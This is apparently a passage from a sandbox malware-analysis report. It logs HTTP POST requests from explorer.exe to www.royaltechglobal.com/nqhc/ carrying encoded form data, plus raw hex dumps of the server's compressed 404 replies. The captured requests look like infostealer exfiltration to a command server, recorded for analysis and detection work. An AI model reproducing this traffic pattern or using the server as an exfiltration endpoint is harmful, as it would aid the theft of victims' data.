                                                                                                                                                                                    Nov 21, 2022 19:24:01.441745996 CET1695INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:24:01.441827059 CET1696INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:24:01.556124926 CET1697INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    65192.168.11.2049891192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:03.281064034 CET1698OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 527
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 75 34 68 51 4a 64 38 2d 39 54 56 5a 68 79 4b 2d 33 72 7e 65 45 2d 58 73 71 58 4a 44 4e 68 62 39 41 35 73 68 58 6d 28 6a 67 4c 6b 4b 61 64 49 32 6f 6a 35 38 68 48 49 70 68 53 72 4a 34 42 41 77 70 47 6b 6a 75 71 7e 5a 51 5a 45 31 79 6b 36 42 6e 37 78 6d 4f 38 44 4f 6b 33 6b 36 51 6c 67 52 30 45 67 38 7a 37 59 4f 7a 54 75 7a 6d 36 45 79 66 72 44 39 4d 63 70 34 48 46 61 74 45 4d 4f 53 47 38 4a 4f 47 57 42 71 53 51 66 59 65 4d 30 34 32 48 71 50 59 32 44 48 37 4d 44 61 34 4d 63 2d 53 70 74 70 7e 63 74 4d 51 72 6c 4f 75 49 72 64 66 55 4e 65 36 30 32 61 54 4d 79 75 7a 54 28 39 4a 33 54 45 70 31 78 71 62 79 44 74 28 52 70 6f 5a 34 7e 48 63 38 52 64 52 6d 34 57 4d 39 4a 69 61 7a 30 4d 43 50 6f 33 6a 39 42 77 7e 61 77 56 76 53 6d 55 6f 36 52 7a 32 2d 67 54 53 46 37 46 72 71 57 51 55 46 72 6d 43 44 54 30 34 41 36 64 28 44 31 6a 54 47 36 4a 65 4c 6a 4d 41 59 4a 59 31 6c 37 63 67 7a 62 74 4c 47 67 72 51 30 63 76 43 44 68 6a 32 68 57 62 4c 42 72 2d 6d 45 4a 44 70 4b 4c 65 73 50 66 48 38 4c 74 55 4a 66 71 70 33 61 4b 6e 42 4a 49 68 28 4f 66 6a 48 55 7e 50 75 50 66 69 44 4f 34 52 73 49 43 45 34 64 63 49 4f 51 51 57 4d 48 54 62 31 78 5a 46 4e 63 72 33 37 72 4b 53 7a 35 41 4e 53 58 37 7a 46 66 6e 36 6b 59 33 64 58 77 51 53 6e 7a 7a 51 63 59 62 57 4d 77 62 58 28 77 6c 33 57 35 6c 63 76 53 35 35 51 79 43 31 5a 77 6a 54 64 43 48 5f 4d 55 48 56 6d 70 62 6e 43 53 70 6e 39 48 55 63 36 33 43 61 4e 53 4e 46 4b 54 53 34 77 42 66 73 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hu4hQJd8-9TVZhyK-3r~eE-XsqXJDNhb9A5shXm(jgLkKadI2oj58hHIphSrJ4BAwpGkjuq~ZQZE1yk6Bn7xmO8DOk3k6QlgR0Eg8z7YOzTuzm6EyfrD9Mcp4HFatEMOSG8JOGWBqSQfYeM042HqPY2DH7MDa4Mc-Sptp~ctMQrlOuIrdfUNe602aTMyuzT(9J3TEp1xqbyDt(RpoZ4~Hc8RdRm4WM9Jiaz0MCPo3j9Bw~awVvSmUo6Rz2-gTSF7FrqWQUFrmCDT04A6d(D1jTG6JeLjMAYJY1l7cgzbtLGgrQ0cvCDhj2hWbLBr-mEJDpKLesPfH8LtUJfqp3aKnBJIh(OfjHU~PuPfiDO4RsICE4dcIOQQWMHTb1xZFNcr37rKSz5ANSX7zFfn6kY3dXwQSnzzQcYbWMwbX(wl3W5lcvS55QyC1ZwjTdCH_MUHVmpbnCSpn9HUc63CaNSNFKTS4wBfso.
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600155115 CET1699INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:24:03 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                    Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    X-Endurance-Cache-Level: 2
                                                                                                                                                                                    X-nginx-cache: WordPress
                                                                                                                                                                                    Content-Length: 13045
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a a2 5f 3b 55 77 6f da 22 67 7a ba 57 af 5e bd fa 4f be 7d 7d fe f6 1f 3f bf 20 a9 c9 f8 70 77 b7 6f 7f 49 cc d4 c0 e1 46 39 84 53 91 0c 1c 10 ee 2f 17 ce ee 4e ae 60 c4 ae 07 8e 4c 7a 58 60 72 dd f3 7d 99 e4 5e 06 be d0 4f 1d 82 00 3b fd 14 68 3c dc dd 21 64 a7 9f 81 a1 24 4a a9 d2 60 06 ce 2f 6f bf 73 4f 9c e5 27 41 33 18 38 63 06 93 5c 2a e3 90 48 0a 03 02 53 27 2c 36 e9 20 86 31 8b c0 2d 2f 75 dd ee ce 4e ff 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b d2 f1 5a de b1 17 10 97 50 26 35 48 2f 92 19 71 dd a1 4d 5f ea a4 64 28 8d 5e ea 23 24 13 31 5c 3b c4 bf 9b 9a 80 00 45 8d 54 4b d9 77 9a ee 3f fb f1 35 fe 1e cc bb cf 60 74 a4 58 6e 88 99 e6 08 44 f3 9c b3 88 1a 26 85 cf e3 c3 f7 5a 0a 84 e4 54 6b 7c 2b c9 ba 3a 4a 21 a3 76 c2 9d 9d 1b e7 3f ca 7e d7 c6 e9 39 95 c6 ef fc 77 7e 95 e2 49 95 38 0d e7 3f 12 45 f3 d4 e9 fd 86 c9 b6 09 66 3e 57 a8 7a a4 8a 2c 7c c9 b4 b1 39 2c 5e 01 50 72 4a b9 81 28 4d b8 0c 29 b7 02 bd f3 c5 1f 69 f4 ce 7f 1a ce 8b 79 55 cc 0c 64 16 e7 05 87 0c 27 5f e9 64 e3 3f e2 fb b6 3d 9e f2 45 41 2e 35 b3 42 38 bd a0 6a e2 f4 16 c0 bf 42 f8 33 4d 60 5b 5c cc b3 9b c2 c4 1f 64 66 ab 0a c5 b7 a8 ba c5 32 14 b7 24 b4 ad 3e f3 09 6e 1b 1f af c3 5d ac 65 35 5a 9f ac 46 85 be d0 e4 27 69 c8 77 b2 10 f1 b6 c2 d4 00 28 4f ae 60 cc 64 a1 b7 93 68 49 9c df 97 e5 79 ad 12 2a d8 9f a5 ef b7 b6 8a 5c 2d aa 67 79 63 73 c9 5b 4c 26 df 97 d9 5b 2f bb e1 70 99 c8 65 59 7f cc 50 d4 d7 e1 7b 88 cc b6 28 93 dc 8d a4 30 20 cc 3b bf c8 b9 a4 b1 7e e7 b7 9a ad d6 3b 3f 08 de f9 91 92 79 0e b1 fb 12 3b bd a2 57 ca 0d bc 5c 24 1f 35 b2 85 c0 c2 09 8b 4d 8a a6 e8 34 1b 4e 0a 2c 49 8d d3 eb b4 71 33 cc 92 2f a7 f9 38 e8 db e5 05 7d 94 c1 9e 4e 20 cc ab aa 0f 71 15 52 17 2f a9 48 8a 92 bf 03 c2 fd e5 c2 06 f5 cf 54 99 d7 a3 ed 47 c2 f6 9a 19 b0 36 0d 15 d0 38 52 45 16 6e 5d 5e cf b0 a8 b4 de bd a7 ca 85 6d b0 ed fa 66 84 b6 77 e4 06 53 af 15 29 2f 2c cd 14 d4 c7 2d 1e c7 fb fd 76 77 67 a7 ef eb 48 b1 dc 0c ed f9 89 eb 92 67 9c 13 26 c8 6b 01 e4 e2 c5 6b e2 ba c3 dd dd dd ea e9 6d ca 34 b1 63 11 fc 95 b9 61 19 fb 13 62 32 61 26 25 26 05 f2 0f 49 b5 29 ab 72 5e 24 08 32 0e 4e bd a0 49 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                                    Data Ascii: rksg1\- "c+;OR&0`bto$_;Uwo"gzW^O}}? pwoIF9S/N`LzX`r}^O;h<!d$J`/osO'A38c\*HS',6 1-/uNg&kkZP&5H/qM_d(^#$1\;ETKw?5`tXnD&ZTk|+:J!v?~9w~I8?Ef>Wz,|9,^PrJ(M)iyUd'_d?=EA.5B8jB3M`[\df2$>n]e5ZF'iw(O`dhIy*\-gycs[L&[/peYP{(0 ;~;?y;W\$5M4N,Iq3/8}N qR/HTG68REn]^mfwS)/,-vwgHg&kkm4cab2a&%&I)r^$2NI\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600241899 CET1701INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f be d7 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                                    Data Ascii: PKTK?e%,{RXE~|'q)suBFD<uomZe~{:<MC5^dUQ,@f~h8LNx!,0ho!95oFTvb"t(@M]&.CS~s{a%IF.zy%W+6lcmre~=DV
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600327015 CET1702INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba df 44 48 6b e9 7e d0 03
                                                                                                                                                                                    Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$EDHk~oLo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600434065 CET1703INData Raw: 2c 70 7b 0c 52 1e 97 90 b6 2c ab 78 e3 20 e8 bb 69 af f6 40 59 f6 c8 2a 32 66 dc b0 40 96 62 59 cc 96 55 73 86 f6 28 8c 82 3f 0a a6 20 76 ad d3 d6 92 98 db e9 2c a7 71 cc 44 b2 f0 78 29 72 d3 6b 6f 5e 97 14 17 96 ab d6 0c 89 a6 c0 92 d4 94 10 1f
                                                                                                                                                                                    Data Ascii: ,p{R,x i@Y*2f@bYUs(? v,qDx)rko^iSD3(2,5=*E4gr&*P.a#Qc)Dq@b})99CD@{jTujCb6S=-9gHrzH`Auvu*B6BDB=t6vtM/8()
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600559950 CET1705INData Raw: d7 3e d9 90 72 82 29 5d af 79 64 53 6e 7b 93 14 14 ec 7b 4c a3 10 53 59 18 77 c4 e1 fa e0 26 a1 b9 1d a8 6b 73 42 19 4f c9 4a 86 9c 90 21 f1 28 67 89 e0 30 32 37 18 a1 68 61 7b 3e cb 50 4f 26 5c 26 38 c3 b5 6b 43 15 be 34 ef 84 41 c4 38 ca a3 e0
                                                                                                                                                                                    Data Ascii: >r)]ydSn{{LSYw&ksBOJ!(g027ha{>PO&\&8kC4A8%Hk4@P7ue#0<aY.bl~~$6"IWj]/.Xmf!];aI{dLNrrpr28ppl`+Z6p}3GN{~\f =R
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600680113 CET1706INData Raw: ca ca 1f 3e a2 87 17 9c 86 87 af 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 df d2 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d
                                                                                                                                                                                    Data Ascii: >Euu1^(ejKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD~i`Z3m0Xi?;T{F24~_PY<H@i{BSR.e/"rS^s)b0+Ja{?13_9HS->B%ic
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600797892 CET1707INData Raw: 5a ef 91 0c 62 46 07 7b 94 f3 3d e2 0f 77 fb 9c 89 2b 82 3b 19 ec 69 74 3a e8 14 c0 ec 11 16 0f f6 c6 13 37 a6 ea ca 0d b9 8c ae dc f2 d5 2d 21 52 05 a3 c1 5e 6a 4c de f3 7d 25 a7 94 1b 88 d2 84 cb 90 72 2f 92 99 3f c9 dd 48 0a 03 c2 f8 26 85 0c
                                                                                                                                                                                    Data Ascii: ZbF{=w+;it:7-!R^jL}%r/?H&_cTk02KX/@7=R%`"W;,w|CRm3/Y(J,z8Bp7&&?DG@*bwrTs9pvK)rk Jmd2x4
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600891113 CET1709INData Raw: e3 a3 ee e7 f7 b7 77 8c b8 9d e3 66 b7 ec d3 c6 8e ad 15 0e 4b 38 cf 36 e0 04 75 47 7f 8d 3a 73 c9 d0 34 40 98 68 0d 9c 0b 59 a8 08 be 57 34 4f 59 e4 10 99 83 a2 46 aa 81 c3 44 0d 53 8a 87 87 ca 32 d6 d6 c3 3e 7e 91 eb 8c 0b ec 97 1a 93 f7 7c 7f
                                                                                                                                                                                    Data Ascii: wfK86uG:s4@hYW4OYFDS2>~|2x'UM3<VC&,6iiX8QgD^Lqfs#rpPK^8#FGSgDA"jj23!*UbFlNmmi+;`
                                                                                                                                                                                    Nov 21, 2022 19:24:03.600958109 CET1710INData Raw: f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 0c 7f 90 19 f4 7d 8a 3b e0 6c b8 bb 86 d6 d1 e3 b4 72 a9 cd a5 3d dd 67 96 d3 64 39 8a 68 5b f1 f2 69 28 0b e3 16 da 77 86 cf ec 91 fc a2 37 b2 3c fe ac 2c 8f b7 64 19 49 61 68 54 f3 3c af 2e 8f 31
                                                                                                                                                                                    Data Ascii: |_)42d};lr=gd9h[i(w7<,dIahT<.1=LOd1h</H^|#2WlL)VpMJ"?WsX/8c63OTG7,oGA22:!AH!O.c.mtbD5Q4}636r\E"c6{h
                                                                                                                                                                                    Nov 21, 2022 19:24:03.601020098 CET1711INData Raw: 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 5e d1 cf 40 aa 53 8a 95 2b c6 3f 1d ab 5d b1 42 87 df c5 42 d7 f6 7d 5d fa 19 2f 7d 1d 29 96 1b 62 a6 39 1a dd c0 b5 f1 df d3 31 ad a2 ce 70 d7 ff 1b e9 3f f9 ed fc db 67 6f 9f fd 46 fe e6 ef
                                                                                                                                                                                    Data Ascii: ;`YCUP>k^@S+?]BB}]/})b91p?goFYr3J2 0/8>q,6CvwfxDyJEyATs@'#^`lMC;Jl`B~}hCK1K0
                                                                                                                                                                                    Nov 21, 2022 19:24:03.717432022 CET1712INData Raw: 2e 9f e5 67 a1 db 74 86 b8 83 52 f0 99 de 93 c9 c4 1b 4f d0 14 19 e8 52 ec ea e8 8f 14 80 1b 53 75 e5 4e a4 8a 73 05 5a bb e5 93 4f 0c 55 09 98 c1 de 65 c8 a9 b8 da 1b 7e 8b 59 e4 57 cc fa d9 66 91 b7 36 ab 54 ff f9 94 fc fd d7 f2 8a db c8 ef 73
                                                                                                                                                                                    Data Ascii: .gtRORSuNsZOUe~YWf6Tstq(6&#r)*%'.-s|\@hk;c| {X,;._~eGdrC4%cZE"LT.v1Q7>SE\P2 7f~Q


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    66192.168.11.2049892192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:24:05.414607048 CET1719OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.royaltechglobal.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.royaltechglobal.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 6d 34 68 69 42 64 39 5a 52 54 61 35 68 79 4a 2d 33 71 7e 65 45 5a 58 6f 4f 54 4a 44 51 63 62 5f 49 35 74 32 7a 6d 28 51 49 4c 79 61 61 41 48 57 6f 68 6f 73 67 45 49 70 39 4f 72 4a 39 38 48 44 31 47 6c 67 32 71 70 65 45 65 48 6c 79 59 36 42 6e 33 6d 32 4f 30 44 50 51 6e 6b 36 4d 6c 67 53 41 45 76 76 62 37 61 64 62 54 30 7a 6d 35 52 69 65 72 4e 64 4e 6b 70 34 44 52 61 74 45 79 4f 51 71 38 4a 4f 6d 57 43 74 7e 58 52 59 65 4d 33 34 32 49 75 50 45 36 44 47 58 45 44 61 4d 4d 63 2d 36 70 74 4a 7e 63 6f 74 51 73 78 2d 75 4b 76 64 65 63 65 4f 6d 43 32 61 58 69 79 76 48 54 7e 4e 64 33 53 7a 46 31 39 76 37 79 64 64 28 50 6d 49 5a 6e 78 6e 63 67 52 62 78 51 34 57 73 4c 4a 6c 61 7a 30 74 69 50 75 53 50 2d 43 51 7e 63 28 31 76 48 77 6b 6b 32 52 77 66 6e 67 54 54 65 37 45 66 71 57 6a 63 46 73 6a 69 41 51 6b 34 48 76 4e 28 53 37 44 66 32 36 4a 44 47 6a 4e 6f 79 4a 62 5a 6c 37 38 67 7a 4c 63 4c 42 71 62 51 7a 44 66 43 64 7e 7a 32 50 57 62 48 33 72 5f 79 2d 4a 54 46 4b 4e 75 38 50 49 6e 38 49 72 30 4a 62 77 5a 32 51 4f 6e 42 4a 49 68 7a 77 66 69 37 55 7e 64 75 50 4f 43 7a 4f 39 43 45 49 46 30 34 62 63 49 50 65 51 57 77 4b 54 62 4e 66 5a 45 38 4a 72 78 6a 72 4c 48 66 35 42 4f 4b 55 72 7a 45 30 6a 36 6b 4c 7a 64 54 6a 51 53 72 72 7a 51 4d 49 62 6b 49 77 61 58 76 77 68 33 57 36 33 4d 76 56 70 5a 51 6f 50 56 46 57 6a 54 42 38 48 5f 4a 4a 48 58 6d 70 65 47 6a 57 35 6d 31 4e 41 75 69 42 4d 4e 6b 62 44 33 71 69 44 34 55 79 42 72 62 56 38 65 36 6b 55 61 49 30 37 47 68 61 46 58 4b 6f 49 48 57 72 58 44 37 62 54 6e 65 57 54 34 42 76 66 57 46 76 79 42 75 73 50 4d 64 74 57 53 44 42 38 6c 48 32 56 46 6c 74 7e 67 42 75 59 70 6e 53 7a 46 72 68 47 38 76 43 54 72 36 50 66 33 76 36 4a 30 76 39 69 41 32 37 39 6f 33 56 57 54 4e 4f 64 72 6a 43 34 72 64 6d 55 47 30 38 4d 59 4b 76 73 75 51 48 6e 30 74 39 35 2d 45 38 57 51 45 5a 5a 39 6b 48 45 6f 41 6e 56 68 54 73 56 6e 69 52 37 37 72 45 58 42 45 56 4a 52 65 76 52 63 4c 33 58 61 58 31 39 4a 39 4e 36 53 4e 4f 74 6a 38 68 71 2d 4f 38 5a 64 6d 48 38 4c 79 59 4b 73 77 76 4a 50 61 72 46 73 45 50 6f 64 37 44 71 6c 58 73 36 6e 4d 38 39 77 45 4a 62 6a 36 36 77 42 61 33 49 4c 37 73 35 34 4b 66 71 36 4b 69 31 32 73 37 63 31 74 55 73 51 51 4c 48 4c 4e 71 36 67 7a 61 43 4c 66 55 39 6d 4e 45 75 45 52 55 5a 5a 4e 50 30 76 36 73 32 50 43 46 51 55 59 41 63 6c 36 4e 58 65 6a 41 4b 67 34 72 75 42 63 34 50 51 28 37 36 45 59 52 41 39 56 65 36 66 34 58 49 4a 74 56 48 34 7a 6f 55 37 61 49 28 39 76 4d 28 39 34 72 71 2d 49 70 65 72 42 6d 50 7a 31 4d 4b 65 54 67 71 68 62 76 55 64 31 38 4b 46 71 79 4e 52 64 51 46 6a 76 50 4e 7a 47 56 44 32 36 32 45 30 48 7a 32 5a 75 49 30 43 37 64 63 41 4b 49 78 68 30 56 30 53 55 77 6c 58 78 4d 36 42 6c 75 33 48 4a 51 7e 33 71 76 72 46 4a 32 50 73 4f 51 4b 56 4b 45 38 54 69 33 57 62 46 48 74 39 58 52 7a 2d 39 33 79 2d 6c 6e 75 46 30 4e 63 64 54 64 47 6c 4e 78 55 5a 32 49 76 58 74 66 4f 58 28 4d 28 62 70 61 66 76 32 35 39 64 57 79 4e 45 70 62 68 77 63 68 54 5f 28 74 43 72 4a 35 67 44 36 47 42 37 67 4c 44 2d 4f 5f 73 4c 72 37 65 4f 39 43 56 52 5a 37 36 4c 69 67 52 31 46 43 4f 53 59 56 48 71 75 59 54 38 58 5a 32 39 42 72 42 58 47 42 4a 30 34 30 48 47 77 4b 6a 5f 47 52 45 6b 70 63 5a 53 28 56 6f 6e 7a 66 6f 4e 39 55 7e 6a 79 6f 6f 42 62 5f 54 6a 4a 67 63 77 62 77 30 7a 63 68 7a 5a 73 41 73 65 74 2d 71 34 59 79 7e 33 65 41 72 48 6b 56 51 76 6a 65 45 4c 76 4f 71 68 47 4c 6a 4b 50 45 4c 35 73 37 67 30 47 6f 6d 2d 51 4d 66 44 50 38 41 51 6d 67 73 4b 66 51 6f 36 32 65 68 76 7e 75 56 43 7a 77 58 55 62 68 6a 78 69 68 6a 67 6e 6f 5a 58 4f 31 79 31 6a 43 4a 43 4d 46 5a 55 7a 71 52 39 71 6f 4f 42 37 32 53 59 4e 62 6d 69 47 56 38 33 7a 36 43 52 48 6e 62 58 4e 47 51 54 4e 37 4f 48 76 6a 70 58 31 55 61 76 30 31 48 30 55 64 28 4d 77 6e 76 6e 39 47 30 45 57 6d 64 33 47 35 33 59 44 50 41 63 34 51 73 4a 4f 34 30 55 48 45 77 69 53 56 43 44 37 68 61 42 77 76 4e 70 36 45 31 58 49 6e 71 73 72 36 50 6a 61 44 69 61 59 56 6f 4b 75 71 79 77 39 50 7e 63 31 7a 6e 37 4a 69 31 4a 46 75 58
                                                                                                                                                                                    Data Ascii: r4txB=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hm4hiBd9ZRTa5hyJ-3q~eEZXoOTJDQcb_I5t2zm(QILyaaAHWohosgEIp9OrJ98HD1Glg2qpeEeHlyY6Bn3m2O0DPQnk6MlgSAEvvb7adbT0zm5RierNdNkp4DRatEyOQq8JOmWCt~XRYeM342IuPE6DGXEDaMMc-6ptJ~cotQsx-uKvdeceOmC2aXiyvHT~Nd3SzF19v7ydd(PmIZnxncgRbxQ4WsLJlaz0tiPuSP-CQ~c(1vHwkk2RwfngTTe7EfqWjcFsjiAQk4HvN(S7Df26JDGjNoyJbZl78gzLcLBqbQzDfCd~z2PWbH3r_y-JTFKNu8PIn8Ir0JbwZ2QOnBJIhzwfi7U~duPOCzO9CEIF04bcIPeQWwKTbNfZE8JrxjrLHf5BOKUrzE0j6kLzdTjQSrrzQMIbkIwaXvwh3W63MvVpZQoPVFWjTB8H_JJHXmpeGjW5m1NAuiBMNkbD3qiD4UyBrbV8e6kUaI07GhaFXKoIHWrXD7bTneWT4BvfWFvyBusPMdtWSDB8lH2VFlt~gBuYpnSzFrhG8vCTr6Pf3v6J0v9iA279o3VWTNOdrjC4rdmUG08MYKvsuQHn0t95-E8WQEZZ9kHEoAnVhTsVniR77rEXBEVJRevRcL3XaX19J9N6SNOtj8hq-O8ZdmH8LyYKswvJParFsEPod7DqlXs6nM89wEJbj66wBa3IL7s54Kfq6Ki12s7c1tUsQQLHLNq6gzaCLfU9mNEuERUZZNP0v6s2PCFQUYAcl6NXejAKg4ruBc4PQ(76EYRA9Ve6f4XIJtVH4zoU7aI(9vM(94rq-IperBmPz1MKeTgqhbvUd18KFqyNRdQFjvPNzGVD262E0Hz2ZuI0C7dcAKIxh0V0SUwlXxM6Blu3HJQ~3qvrFJ2PsOQKVKE8Ti3WbFHt9XRz-93y-lnuF0NcdTdGlNxUZ2IvXtfOX(M(bpafv259dWyNEpbhwchT_(tCrJ5gD6GB7gLD-O_sLr7eO9CVRZ76LigR1FCOSYVHquYT8XZ29BrBXGBJ040HGwKj_GREkpcZS(VonzfoN9U~jyooBb_TjJgcwbw0zchzZsAset-q4Yy~3eArHkVQvjeELvOqhGLjKPEL5s7g0Gom-QMfDP8AQmgsKfQo62ehv~uVCzwXUbhjxihjgnoZXO1y1jCJCMFZUzqR9qoOB72SYNbmiGV83z6CRHnbXNGQTN7OHvjpX1Uav01H0Ud(Mwnvn9G0EWmd3G53YDPAc4QsJO40UHEwiSVCD7haBwvNp6E1XInqsr6PjaDiaYVoKuqyw9P~c1zn7Ji1JFuXIxkCnk1E9qSQU5c911oQ_RtGZge4UnWli~FUKNzEj38xueZnPN_iqr3ABEfQVVDSkosJTWILNFxdELG9NuObvpLBRKHsit8H9iI2iRPkNmScMT-O_WiE-RSLn35c0hc2-g5AdLPYszRMIMYOQn6lLysCm~qKKf_iwYCIDBNb9ONSoweWeiMgfExifGxRJNUKvhtU3qad1LgygiIJP~bLe00q6fWcAAxffaByh2NftaIIwO3l78rAznFtAiz24s-GerDpIvDViAMfOlrXw4mBZ8J(36E16~chqXZCLXc9exgYPxAac1qX3eNbPN02L0WGSUxJZSLUNVTVaenttuxzp~Xb9Nph6zy0av9EtwvF8nB8-mstN4WXYzknH21WjIpxrqihLhMcG3-6owcWuGFp7KzIVfheGjFWfaP~KGR4fvJ(xf9UzrJ2W(1PMv5Tle9eOHnh0ff7Ban(p3bAC~oNcU3p_Cv2w9lqElV(_4pfJlSe-qY7HS